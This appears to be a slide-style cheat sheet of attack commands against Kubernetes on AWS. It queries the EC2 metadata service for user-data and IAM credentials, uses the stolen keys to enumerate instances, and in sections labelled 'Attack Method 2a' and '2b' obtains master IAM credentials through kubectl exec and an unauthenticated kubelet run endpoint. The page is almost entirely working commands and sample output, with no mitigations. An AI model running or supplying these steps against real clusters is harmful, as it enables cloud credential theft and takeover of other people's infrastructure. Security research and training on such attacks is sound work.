Skip to content

AWS

Access the Cloud Provider Metadata API Directly

$ curl -s 169.254.169.254/latest/user-data

#!/bin/bash -xe
...
aws s3 --region $REGION
cp s3://...
...
kubeadm join --token mykubeadmtoken 10.0.0.1:443

EC2 API: Obtain IAM Credentials

$ curl -s 169.254.169.254/latest/meta-data/iam/security-credentials/kubernetes-worker-iam-policy
{
  "Code" : "Success",
  "LastUpdated" : "2017-12-25T00:00:00Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "MyAccessKeyID",
  "SecretAccessKey" : "MySecretAccessKey",
  "Token" : "MySessionToken",
  "Expiration" : "2017-12-25T04:00:00Z"
}

EC2 API: Use IAM Credentials

# Place credentials in ENV vars
$ export AWS_REGION=us-east-1
$ export AWS_ACCESS_KEY_ID=MyAccessKeyID
$ export AWS_SECRET_ACCESS_KEY=MySecretAccessKey
$ export AWS_SESSION_TOKEN=MySessionToken

# Enumerate instances, get all user-data scripts
$ aws ec2 describe-instances
$ aws ec2 describe-instance-attribute --instance-id i-xxxxxxx --attribute userData

EC2 Metadata Master IAM Credentials

Attack Method 2a: "kubectl exec" into a Pod

$ kubectl exec -it etcd-000 curl -s 169.254.169.254/latest/meta-data/iam/securitycredentials/kubernetes-master-iam-policy
{
  "Code" : "Success",
  "LastUpdated" : "2017-12-25T00:00:00Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "MasterAccessKeyID",
  "SecretAccessKey" : "MasterSecretAccessKey",
  "Token" : "MasterSessionToken",
  "Expiration" : "2017-12-25T04:00:00Z"
}

Attack Method 2b: Kubelet API "run cmd"

$ curl -sk https://10.0.0.1:10250/run/kube-system/etcd-000/etcd-server -d “cmd=curl -s 169.254.169.254/latest/meta-data/iam/security-cre dentials/kubernetes-master-iam-policy”
{
  "Code" : "Success",
  "LastUpdated" : "2017-12-25T00:00:00Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "MasterAccessKeyID",
  "SecretAccessKey" : "MasterSecretAccessKey",
  "Token" : "MasterSessionToken",
  "Expiration" : "2017-12-25T04:00:00Z"
}